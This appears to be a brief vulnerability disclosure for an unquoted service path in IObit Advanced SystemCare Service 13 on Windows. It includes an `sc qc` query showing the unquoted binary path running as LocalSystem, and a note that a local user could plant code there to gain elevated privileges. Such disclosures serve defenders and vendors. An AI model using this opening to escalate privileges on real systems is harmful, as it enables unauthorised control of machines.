Advanced System Care Service version 13 suffers from an unquoted service path vulnerability.
d4bc265e5db84352221451e0ee1535df
# Title: Advanced System Care Service 13 - 'AdvancedSystemCareService13' Unquoted Service Path
# Author: Jair Amezcua
# Date: 2020-11-10
# Vendor Homepage: https://www.iobit.com
# Software Link: https://www.iobit.com/es/advancedsystemcarepro.php
# Version : 13.0.0.157
# Tested on: Windows 10 64bit(EN)
# CVE : N/A
# 1. Description:
# Unquoted service paths in Advanced System Care Service 13 v13.0.0.157 have an unquoted service path.
# PoC
===========
C:\>sc qc AdvancedSystemCareService13
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: AdvancedSystemCareService13
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\Advanced SystemCare Pro\ASCService.exe
LOAD_ORDER_GROUP : System Reserved
TAG : 0
DISPLAY_NAME : Advanced SystemCare Service 13
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
#Description Exploit:
# A successful attempt would require the local user to be able to insert their code in the system root path
# undetected by the OS or other security applications where it could potentially be executed during
# application startup or reboot. If successful, the local user's code would execute with the elevated
# privileges of the application.